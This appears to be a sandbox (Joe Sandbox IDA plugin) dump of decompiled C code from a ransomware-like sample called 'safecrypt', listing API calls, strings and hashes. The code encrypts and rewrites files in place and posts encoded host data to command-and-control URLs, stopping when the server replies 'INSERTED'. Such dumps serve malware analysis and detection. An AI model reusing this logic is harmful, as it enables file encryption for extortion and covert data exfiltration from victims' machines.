                    								_v8540 = 0x10 - (_t91 & 0x0000000f);
                    								_v8532 = _t92;
                    								_t143 = HeapAlloc(_t182, 0, _t92);
                    								if(_t143 == 0) {
                    									goto L17;
                    								} else {
                    									if(ReadFile(_t180, _t143, _v8524,  &_v8504, 0) != 0) {
                    										if( *_t143 != 0 ||  *((char*)(_t143 + 0x18)) != 4) {
                    											_t153 = _v8524;
                    											if(_t153 == _v8504) {
                    												_t171 = _t143 + _t153;
                    												E0042C770(_t143 + _t153, _v8540, _v8540);
                    												_t99 = HeapAlloc(_t182, 0, _v8532);
                    												_v8524 = _t99;
                    												if(_t99 == 0) {
                    													goto L16;
                    												} else {
                    													_t101 =  *0x439228; // 0x11c6512
                    													_t154 =  *0x43922c; // 0x26698d31
                    													_t173 =  *0x439230; // 0xff978117
                    													_v8520 = _t101;
                    													_v24 = _t101;
                    													_t102 =  *0x439230; // 0xff978117
                    													_v8516 = _t154;
                    													_v20 = _t154;
                    													_t155 =  *0x43fed0; // 0x0
                    													_v8512 = _t173;
                    													_t174 =  *0x439234; // 0xaafaad0e
                    													_v16 = _t102;
                    													_v8508 = _t174;
                    													_v12 = _t174;
                    													E0040D950( &_v56, _t155, _t155);
                    													_push( &_v8500);
                    													_push( &_v56);
                    													E00424020();
                    													_push( &_v8500);
                    													_push( &_v24);
                    													_t177 = _v8524;
                    													_push(_t143);
                    													if(E0041BF80(_v8532, _v8524) != 1) {
                    														SetFilePointer(_t180, 0, 0, 0);
                    														_v8528 = 0;
                    														if(WriteFile(_t180, 0x440010, 0x15c,  &_v8528, 0) != 0) {
                    															_v8528 = 0;
                    															if(WriteFile(_t180,  &_v8520, 0x14,  &_v8528, 0) == 0) {
                    																goto L23;
                    															} else {
                    																_t177 = _v8524;
                    																_v8528 = 0;
                    																if(WriteFile(_t180, _v8524, _v8532,  &_v8528, 0) == 0) {
                    																	goto L21;
                    																} else {
                    																	FlushFileBuffers(_t180);
                    																	CloseHandle(_t180);
                    																	_t181 = 0;
                    																	while(MoveFileExW(_v8536,  &_v8252, 8) == 0) {
                    																		if(GetLastError() == 0xb7) {
                    																			DeleteFileW( &_v8252);
                    																		}
                    																		Sleep(0x190);
                    																		_t181 = _t181 + 1;
                    																		if(_t181 < 4) {
                    																			continue;
                    																		}
                    																		break;
                    																	}
                    																	 *0x4401f0 =  *0x4401f0 + _v8532;
                    																	_t180 = HeapFree;
                    																	asm("adc dword [0x4401f4], 0x0");
                    																	HeapFree(_t182, 0, _t143);
                    																	_t171 = _v8524;
                    																	HeapFree(_t182, 0, _v8524);
                    																	goto L32;
                    																}
                    															}
                    														} else {
                    															L23:
                    															HeapFree(_t182, 0, _t143);
                    															HeapFree(_t182, 0, _v8524);
                    															_t114 = CloseHandle(_t180);
                    															_t65 =  &_v8; // 0x413e24
                    															return E004256D3(_t114 | 0xffffffff, HeapFree,  *_t65 ^ _t183, _v8524, _t180, _t182);
                    														}
                    													} else {
                    														L21:
                    														HeapFree(_t182, 0, _t143);
                    														HeapFree(_t182, 0, _v8524);
                    														_t122 = CloseHandle(_t180);
                    														_t61 =  &_v8; // 0x413e24
                    														return E004256D3(_t122 | 0xffffffff, HeapFree,  *_t61 ^ _t183, _t177, _t180, _t182);
                    													}
                    												}
                    											} else {
                    												L16:
                    												HeapFree(_t182, 0, _t143);
                    												goto L17;
                    											}
                    										} else {
                    											CloseHandle(_t180);
                    											HeapFree(_t182, 0, _t143);
                    											L32:
                    											_t78 =  &_v8; // 0x413e24
                    											return E004256D3(1, _t143,  *_t78 ^ _t183, _t171, _t180, _t182);
                    										}
                    									} else {
                    										CloseHandle(_t180);
                    										_t138 = HeapFree(_t182, 0, _t143);
                    										_t36 =  &_v8; // 0x413e24
                    										return E004256D3(_t138 | 0xffffffff, _t143,  *_t36 ^ _t183, _t171, _t180, _t182);
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    			}



                    APIs
                    • _memset.LIBCMT ref: 00413EFE
                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F35
                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F46
                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F5E
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F77
                    • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F8B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FDA
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FF8
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414003
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0041400D
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414033
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0041403D
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 0041405A
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414061
                    • _memset.LIBCMT ref: 00414087
                    • HeapAlloc.KERNEL32(00000000,00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00440238), ref: 00414099
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041413A
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 00414146
                    • CloseHandle.KERNEL32(00000000), ref: 00414149
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041416A
                    • WriteFile.KERNEL32 ref: 0041418E
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004141A2
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 004141AE
                    • CloseHandle.KERNEL32(00000000), ref: 004141B1
                    • WriteFile.KERNEL32(00000000,?,00000014,00000000,00000000), ref: 004141E8
                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00414214
                    • FlushFileBuffers.KERNEL32(00000000), ref: 00414223
                    • CloseHandle.KERNEL32(00000000), ref: 0041422A
                    • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414242
                    • GetLastError.KERNEL32 ref: 0041424C
                    • DeleteFileW.KERNEL32(?), ref: 00414260
                    • Sleep.KERNEL32(00000190), ref: 0041426B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414294
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 004142A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileHeap$Free$CloseHandle$Write$AllocAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerProcessReadSizeSleep
                    • String ID: $>A$.micro
                    • API String ID: 3961709388-229995159
                    • Opcode ID: 2499693c2f1d4a650cf9d5746117cd13102541e94c640f78b828302b5b507357
                    • Instruction ID: c96a89c89fe647e19c0434eee4d5d9dd9ee8aecd8f1895bd45c31064d9b9c2c2
                    • Opcode Fuzzy Hash: 2499693c2f1d4a650cf9d5746117cd13102541e94c640f78b828302b5b507357
                    • Instruction Fuzzy Hash: 11C1EC71A00218AFDB24DF65DC49BEE77B8EF99310F1001AAF609E62A0D7745E81CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E0041B6A0(intOrPtr _a4, char _a12, long _a20, intOrPtr _a28, intOrPtr _a32, long _a48, char _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr _a272, char _a276, char _a292, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, intOrPtr _a305, intOrPtr _a309, intOrPtr _a313, intOrPtr _a317, short _a321, char _a323, char _a324, char _a344, long _a345, long _a349, long _a353, char _a356, short _a357, char _a372, char _a373, char _a564, char _a612, char _a628, char _a629, void _a1076, char _a1092, char _a1124, char _a1160, char _a1161, char _a5152, char _a5172, char _a5173, char _a8284, char _a8285, signed int _a12452) {
                    				void* _v0;
                    				intOrPtr _v4;
                    				char** _v12;
                    				void* _v20;
                    				char** _v28;
                    				void* _v36;
                    				intOrPtr _v44;
                    				void _v56;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				long _v80;
                    				char _v100;
                    				char** _v104;
                    				signed int _t96;
                    				char* _t98;
                    				intOrPtr _t99;
                    				intOrPtr _t100;
                    				intOrPtr _t103;
                    				void* _t106;
                    				char* _t111;
                    				intOrPtr _t124;
                    				intOrPtr _t125;
                    				intOrPtr* _t129;
                    				intOrPtr* _t134;
                    				intOrPtr* _t151;
                    				long _t152;
                    				intOrPtr _t159;
                    				char* _t160;
                    				intOrPtr _t168;
                    				intOrPtr _t169;
                    				char _t171;
                    				intOrPtr _t176;
                    				intOrPtr _t179;
                    				intOrPtr _t182;
                    				void* _t190;
                    				intOrPtr* _t191;
                    				intOrPtr _t197;
                    				char* _t199;
                    				intOrPtr _t204;
                    				intOrPtr _t216;
                    				intOrPtr _t218;
                    				char** _t224;
                    				void* _t225;
                    				void* _t227;
                    				long _t231;
                    				char* _t232;
                    				intOrPtr* _t233;
                    				void* _t234;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				void* _t239;
                    				void* _t240;
                    				void* _t245;
                    				void* _t247;
                    				void* _t255;
                    
                    				_t238 = _t237 & 0xfffffff8;
                    				E0042DFB0(0x30ac);
                    				_t96 =  *0x43d01c; // 0xe0063daa
                    				_a12452 = _t96 ^ _t238;
                    				_t98 =  *0x43fb14; // 0x0
                    				_t168 =  *0x43fe10; // 0x0
                    				_t197 =  *0x43fb10; // 0x0
                    				 *0x480490 = _t98;
                    				_t99 =  *0x43fe14; // 0x0
                    				 *0x480494 = _t168;
                    				_t169 =  *0x43fb0c; // 0x0
                    				 *0x48049c = _t99;
                    				_t100 =  *0x43fe1c; // 0x0
                    				 *0x480498 = _t197;
                    				 *0x4804a0 = _t100;
                    				 *0x4804a4 = _t169;
                    				 *0x4804a8 = _t100;
                    				 *0x4804ac = _t169;
                    				E0040D860(E0040D520(), _t197, 0x43ff40, 0x61);
                    				_a344 = 0;
                    				_a345 = 0;
                    				_a349 = 0;
                    				_a353 = 0;
                    				_a357 = 0;
                    				_t103 = E004112C0(_t101);
                    				_t231 = 1;
                    				_t239 = _t238 + 0xc;
                    				_v4 = _t103;
                    				if( *0x460a7c != 1) {
                    					_a344 = 0x676e6950;
                    				} else {
                    					E00425A43( &_a344, 0xf, "Cr");
                    					E00425D1D( &_a344, 0xf, "ypted");
                    					_t239 = _t239 + 0x18;
                    				}
                    				_a1160 = 0;
                    				E0042C770( &_a1161, 0, 0xfff);
                    				_t240 = _t239 + 0xc;
                    				_t106 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 0, 0, 0, 0);
                    				_t224 = 0x480490;
                    				_v20 = _t106;
                    				_v12 = 0x480490;
                    				while(1) {
                    					E0042C770( &_v0, 0, 0x3c);
                    					_v0 = 0x3c;
                    					_a20 = _t231;
                    					_a48 = _t231;
                    					_a372 = 0;
                    					E0042C770( &_a373, 0, 0xff);
                    					_a628 = 0;
                    					E0042C770( &_a629, 0, 0x1ff);
                    					_t232 =  *_t224;
                    					_t111 = _t232;
                    					_t240 = _t240 + 0x24;
                    					_t23 =  &(_t111[1]); // 0x2
                    					_t199 = _t23;
                    					do {
                    						_t171 =  *_t111;
                    						_t111 =  &(_t111[1]);
                    					} while (_t171 != 0);
                    					if(InternetCrackUrlA(_t232, _t111 - _t199, 0,  &_v0) == 0) {
                    						L23:
                    						_t224 =  &(_t224[1]);
                    						_v28 = _t224;
                    						if(_t224 < 0x4804a8) {
                    							_t231 = 1;
                    							continue;
                    						}
                    						L24:
                    						InternetCloseHandle(_v36);
                    						if( *0x460a7c == 0) {
                    							E004258B8(_v44);
                    						}
                    						ExitThread(1);
                    					}
                    					_t117 = _a4;
                    					if(_a4 > 0) {
                    						E004262C8( &_a356, 0x100, _v0, _t117);
                    						_t240 = _t240 + 0x10;
                    					}
                    					_t118 = _a32;
                    					if(_a32 > 0) {
                    						E004262C8( &_a612, 0x200, _a28, _t118);
                    						_t240 = _t240 + 0x10;
                    					}
                    					E0042C770( &_a1124, 0, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t176 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t204 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t124 =  *0x4401f0;
                    					_push(_t176);
                    					_push("3.0.0a");
                    					_push(0);
                    					_push(0x400);
                    					_push(_t204);
                    					_push(_t124);
                    					L00430286();
                    					_push(0);
                    					_push(0x400);
                    					_push(_t204);
                    					_push(_t124);
                    					L00430286();
                    					_push(_t204);
                    					_push(_t124);
                    					_t125 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v72);
                    					E0041BC10(0x1000,  &_a1092, _t125,  &_a276);
                    					_a8284 = 0;
                    					E0042C770( &_a8285, 0, 0xfff);
                    					_t233 =  *0x43fe18; // 0x0
                    					_t245 = _t240 + 0x60;
                    					_a293 = 0;
                    					_a297 = 0;
                    					_a301 = 0;
                    					_a305 = 0;
                    					_a309 = 0;
                    					_a313 = 0;
                    					_a317 = 0;
                    					_a321 = 0;
                    					_a323 = 0;
                    					_t129 = _t233;
                    					_a292 = 0;
                    					_t47 = _t129 + 1; // 0x1
                    					_t225 = _t47;
                    					do {
                    						_t179 =  *_t129;
                    						_t129 = _t129 + 1;
                    					} while (_t179 != 0);
                    					E00420970(0, _t233,  &_a292, _t129 - _t225);
                    					_push( &_a12);
                    					_push( &_a292);
                    					_a260 = 0xaaaaffff;
                    					_a264 = 0xefbe0000;
                    					_a268 = 0xadde;
                    					_a272 = 0xffffffbe;
                    					E00424020();
                    					_t134 =  &_a1092;
                    					_t247 = _t245 + 0xc;
                    					_t234 = _t134 + 1;
                    					do {
                    						_t182 =  *_t134;
                    						_t134 = _t134 + 1;
                    						_t264 = _t182;
                    					} while (_t182 != 0);
                    					_t183 = _t134 - _t234;
                    					E0042C770(_t247 + _t134 - _t234 + 0x4a1, 0x10, 0x10);
                    					_push( &_a12);
                    					_push( &_a260);
                    					_push( &_a1092);
                    					E0041BF80(_t134 - _t234 + 0x10 - (_t183 + 0x00000001 & 0x0000000f) + 1,  &_a8284);
                    					E0041BC10(0x1000,  &_a1092, "data=%s", E0041B640( &_a8284, _t134 - _t234 + 0x10 - (_t183 + 0x00000001 & 0x0000000f) + 1, _t264,  &_a8284));
                    					E004258B8(_t142);
                    					_t236 = E0041BC30( &_a324, _v68);
                    					_v56 = 0x124f80;
                    					InternetSetOptionA(_t236, 6,  &_v56, 4);
                    					GetLastError();
                    					_t227 = E0041BD40( &_a564, _t236);
                    					_a5172 = 0;
                    					E0042C770( &_a5173, 0, 0xc17);
                    					_t151 =  &_a1076;
                    					_t240 = _t247 + 0x40;
                    					_v80 = 0;
                    					_t190 = _t151 + 1;
                    					do {
                    						_t216 =  *_t151;
                    						_t151 = _t151 + 1;
                    					} while (_t216 != 0);
                    					_t152 = _t151 - _t190;
                    					_t191 = "Content-Type: application/x-www-form-urlencoded";
                    					_v68 = _t191 + 1;
                    					do {
                    						_t218 =  *_t191;
                    						_t191 = _t191 + 1;
                    					} while (_t218 != 0);
                    					HttpSendRequestA(_t227, "Content-Type: application/x-www-form-urlencoded", _t191 - _v68,  &_a1076, _t152);
                    					if(GetLastError() != 0) {
                    						L22:
                    						InternetCloseHandle(_t227);
                    						InternetCloseHandle(_t236);
                    						_t224 = _v104;
                    						goto L23;
                    					}
                    					E0041BE60( &_a5152,  &_v100, _t227);
                    					_t159 = _v100;
                    					_t255 = _t240 + 4;
                    					 *((char*)(_t255 + _t159 + 0x149c)) = 0;
                    					 *((char*)(_t255 + _t159 + 0x14a1)) = 0;
                    					_t160 = strstr( &_a5152, "INSERTED");
                    					_t240 = _t255 + 8;
                    					if(_t160 != 0) {
                    						goto L24;
                    					}
                    					goto L22;
                    				}
                    			}

                    APIs
                    • _strcpy_s.LIBCMT ref: 0041B770
                    • _strcat_s.LIBCMT ref: 0041B787
                    • _memset.LIBCMT ref: 0041B7B1
                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 0041B7C2
                    • _memset.LIBCMT ref: 0041B7ED
                    • _memset.LIBCMT ref: 0041B81A
                    • _memset.LIBCMT ref: 0041B837
                    • InternetCrackUrlA.WININET(00000001,00000002,00000000,?), ref: 0041B857
                    • _memset.LIBCMT ref: 0041B8B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet$CrackOpen_strcat_s_strcpy_s
                    • String ID: 3.0.0a$95|F$<$Content-Type: application/x-www-form-urlencoded$INSERTED$Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko$Ping$data=%s$ypted
                    • API String ID: 1420483615-2821691159
                    • Opcode ID: ed3d76b9697e03cb9849d010e63daf4abb5f73007e641d651afa5eabb1c18dbc
                    • Instruction ID: 50ef56a0b56dee79df213e3b543a99367f227d0aacd31190f582176d8807bc1c
                    • Opcode Fuzzy Hash: ed3d76b9697e03cb9849d010e63daf4abb5f73007e641d651afa5eabb1c18dbc
                    • Instruction Fuzzy Hash: 71D1B5B1548340AFD320DB25EC45AEBB7E9AF89704F44493EF189C7262E7745508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041B7D7(char** _a8, void* _a36, intOrPtr _a40, char _a48, long _a56, intOrPtr _a64, intOrPtr _a68, long _a84, char _a296, intOrPtr _a300, intOrPtr _a304, intOrPtr _a308, char _a312, long _a328, char _a329, char _a333, char _a337, char _a341, char _a345, char _a349, char _a353, short _a357, char _a359, char _a360, char _a392, long _a408, char _a409, char _a600, char _a648, long _a664, char _a665, void _a1112, char _a1128, char _a1160, char _a5188, long _a5208, char _a5209, long _a8320, char _a8321) {
                    				void* _v0;
                    				intOrPtr _v8;
                    				void _v20;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				long _v44;
                    				char _v64;
                    				char** _v68;
                    				char* _t84;
                    				intOrPtr _t97;
                    				intOrPtr _t98;
                    				intOrPtr* _t102;
                    				intOrPtr* _t107;
                    				intOrPtr* _t124;
                    				long _t125;
                    				intOrPtr _t132;
                    				char* _t133;
                    				long _t137;
                    				char _t139;
                    				intOrPtr _t144;
                    				intOrPtr _t147;
                    				intOrPtr _t150;
                    				void* _t158;
                    				intOrPtr* _t159;
                    				char* _t165;
                    				intOrPtr _t170;
                    				intOrPtr _t182;
                    				intOrPtr _t184;
                    				char** _t188;
                    				void* _t189;
                    				void* _t191;
                    				char* _t194;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t198;
                    				void* _t199;
                    				void* _t204;
                    				void* _t206;
                    				void* _t214;
                    
                    				do {
                    					E0042C770( &_a36, _t137, 0x3c);
                    					_a36 = 0x3c;
                    					_a56 = 1;
                    					_a84 = 1;
                    					_a408 = _t137;
                    					E0042C770( &_a409, _t137, 0xff);
                    					_a664 = _t137;
                    					E0042C770( &_a665, _t137, 0x1ff);
                    					_t194 =  *_t188;
                    					_t84 = _t194;
                    					_t199 = _t199 + 0x24;
                    					_t9 =  &(_t84[1]); // 0x2
                    					_t165 = _t9;
                    					do {
                    						_t139 =  *_t84;
                    						_t84 =  &(_t84[1]);
                    					} while (_t139 != _t137);
                    					if(InternetCrackUrlA(_t194, _t84 - _t165, _t137,  &_a36) == 0) {
                    						goto L20;
                    					}
                    					_t90 = _a40;
                    					if(_a40 > _t137) {
                    						E004262C8( &_a392, 0x100, _a36, _t90);
                    						_t199 = _t199 + 0x10;
                    					}
                    					_t91 = _a68;
                    					if(_a68 > _t137) {
                    						E004262C8( &_a648, 0x200, _a64, _t91);
                    						_t199 = _t199 + 0x10;
                    					}
                    					E0042C770( &_a1160, _t137, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t144 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t170 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t97 =  *0x4401f0;
                    					_push(_t144);
                    					_push("3.0.0a");
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t170);
                    					_push(_t97);
                    					_t98 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v36);
                    					E0041BC10(0x1000,  &_a1128, _t98,  &_a312);
                    					_a8320 = _t137;
                    					E0042C770( &_a8321, _t137, 0xfff);
                    					_t195 =  *0x43fe18; // 0x0
                    					_t204 = _t199 + 0x60;
                    					_a329 = 0;
                    					_a333 = 0;
                    					_a337 = 0;
                    					_a341 = 0;
                    					_a345 = 0;
                    					_a349 = 0;
                    					_a353 = 0;
                    					_a357 = 0;
                    					_a359 = 0;
                    					_t102 = _t195;
                    					_a328 = _t137;
                    					_t33 = _t102 + 1; // 0x1
                    					_t189 = _t33;
                    					do {
                    						_t147 =  *_t102;
                    						_t102 = _t102 + 1;
                    					} while (_t147 != _t137);
                    					E00420970(_t137, _t195,  &_a328, _t102 - _t189);
                    					_push( &_a48);
                    					_push( &_a328);
                    					_a296 = 0xaaaaffff;
                    					_a300 = 0xefbe0000;
                    					_a304 = 0xadde;
                    					_a308 = 0xffffffbe;
                    					E00424020();
                    					_t107 =  &_a1128;
                    					_t206 = _t204 + 0xc;
                    					_t196 = _t107 + 1;
                    					do {
                    						_t150 =  *_t107;
                    						_t107 = _t107 + 1;
                    						_t221 = _t150 - _t137;
                    					} while (_t150 != _t137);
                    					_t151 = _t107 - _t196;
                    					E0042C770(_t206 + _t107 - _t196 + 0x4a1, 0x10, 0x10);
                    					_push( &_a48);
                    					_push( &_a296);
                    					_push( &_a1128);
                    					E0041BF80(_t107 - _t196 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1,  &_a8320);
                    					E0041BC10(0x1000,  &_a1128, "data=%s", E0041B640( &_a8320, _t107 - _t196 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1, _t221,  &_a8320));
                    					E004258B8(_t115);
                    					_t198 = E0041BC30( &_a360, _v32);
                    					_v20 = 0x124f80;
                    					InternetSetOptionA(_t198, 6,  &_v20, 4);
                    					GetLastError();
                    					_t191 = E0041BD40( &_a600, _t198);
                    					_a5208 = _t137;
                    					E0042C770( &_a5209, _t137, 0xc17);
                    					_t124 =  &_a1112;
                    					_t199 = _t206 + 0x40;
                    					_v44 = _t137;
                    					_t158 = _t124 + 1;
                    					do {
                    						_t182 =  *_t124;
                    						_t124 = _t124 + 1;
                    					} while (_t182 != _t137);
                    					_t125 = _t124 - _t158;
                    					_t159 = "Content-Type: application/x-www-form-urlencoded";
                    					_v32 = _t159 + 1;
                    					do {
                    						_t184 =  *_t159;
                    						_t159 = _t159 + 1;
                    					} while (_t184 != _t137);
                    					HttpSendRequestA(_t191, "Content-Type: application/x-www-form-urlencoded", _t159 - _v32,  &_a1112, _t125);
                    					if(GetLastError() != 0) {
                    						L19:
                    						InternetCloseHandle(_t191);
                    						InternetCloseHandle(_t198);
                    						_t188 = _v68;
                    						goto L20;
                    					}
                    					E0041BE60( &_a5188,  &_v64, _t191);
                    					_t132 = _v64;
                    					_t214 = _t199 + 4;
                    					 *(_t214 + _t132 + 0x149c) = _t137;
                    					 *(_t214 + _t132 + 0x14a1) = _t137;
                    					_t133 = strstr( &_a5188, "INSERTED");
                    					_t199 = _t214 + 8;
                    					if(_t133 != 0) {
                    						break;
                    					}
                    					goto L19;
                    					L20:
                    					_t188 =  &(_t188[1]);
                    					_a8 = _t188;
                    				} while (_t188 < 0x4804a8);
                    				InternetCloseHandle(_v0);
                    				if( *0x460a7c == _t137) {
                    					E004258B8(_v8);
                    				}
                    				ExitThread(1);
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet_alldiv$CrackErrorLastOption_free
                    • String ID: 3.0.0a$<$Content-Type: application/x-www-form-urlencoded$INSERTED$data=%s
                    • API String ID: 1765502259-451914084
                    • Opcode ID: ee516dea520953f8b43f163470cef75af014bb40e6b9b91f6e021b7e200cf844
                    • Instruction ID: 4e84a7fa781297a5c87a2b60a6cb7ac9c42528fe1f2e410d640f63fe350b517e
                    • Opcode Fuzzy Hash: ee516dea520953f8b43f163470cef75af014bb40e6b9b91f6e021b7e200cf844
                    • Instruction Fuzzy Hash: BAB1A5B1508384AFD320DB64EC55EEB77E9AFC9304F44492EF189C7252E7749508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041B7D9(char** _a8, void* _a36, intOrPtr _a40, char _a48, long _a56, intOrPtr _a64, intOrPtr _a68, long _a84, char _a296, intOrPtr _a300, intOrPtr _a304, intOrPtr _a308, char _a312, long _a328, char _a329, char _a333, char _a337, char _a341, char _a345, char _a349, char _a353, short _a357, char _a359, char _a360, char _a392, long _a408, char _a409, char _a600, char _a648, long _a664, char _a665, void _a1112, char _a1128, char _a1160, char _a5188, long _a5208, char _a5209, long _a8320, char _a8321) {
                    				void* _v0;
                    				intOrPtr _v8;
                    				void _v20;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				long _v44;
                    				char _v64;
                    				char** _v68;
                    				char* _t84;
                    				intOrPtr _t97;
                    				intOrPtr _t98;
                    				intOrPtr* _t102;
                    				intOrPtr* _t107;
                    				intOrPtr* _t124;
                    				long _t125;
                    				intOrPtr _t132;
                    				char* _t133;
                    				long _t137;
                    				char _t139;
                    				intOrPtr _t144;
                    				intOrPtr _t147;
                    				intOrPtr _t150;
                    				void* _t158;
                    				intOrPtr* _t159;
                    				char* _t165;
                    				intOrPtr _t170;
                    				intOrPtr _t182;
                    				intOrPtr _t184;
                    				char** _t188;
                    				char** _t189;
                    				void* _t190;
                    				void* _t192;
                    				char* _t195;
                    				intOrPtr* _t196;
                    				void* _t197;
                    				void* _t199;
                    				void* _t200;
                    				void* _t203;
                    				void* _t206;
                    				void* _t208;
                    				void* _t216;
                    
                    				do {
                    					E0042C770( &_a36, _t137, 0x3c);
                    					_a36 = 0x3c;
                    					_a56 = 1;
                    					_a84 = 1;
                    					_a408 = _t137;
                    					E0042C770( &_a409, _t137, 0xff);
                    					_a664 = _t137;
                    					E0042C770( &_a665, _t137, 0x1ff);
                    					_t195 =  *_t188;
                    					_t84 = _t195;
                    					_t203 = _t200 + 0x24;
                    					_t9 =  &(_t84[1]); // 0x2
                    					_t165 = _t9;
                    					do {
                    						_t139 =  *_t84;
                    						_t84 =  &(_t84[1]);
                    					} while (_t139 != _t137);
                    					if(InternetCrackUrlA(_t195, _t84 - _t165, _t137,  &_a36) == 0) {
                    						goto L20;
                    					}
                    					_t90 = _a40;
                    					if(_a40 > _t137) {
                    						E004262C8( &_a392, 0x100, _a36, _t90);
                    						_t203 = _t203 + 0x10;
                    					}
                    					_t91 = _a68;
                    					if(_a68 > _t137) {
                    						E004262C8( &_a648, 0x200, _a64, _t91);
                    						_t203 = _t203 + 0x10;
                    					}
                    					E0042C770( &_a1160, _t137, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t144 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t170 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t97 =  *0x4401f0;
                    					_push(_t144);
                    					_push("3.0.0a");
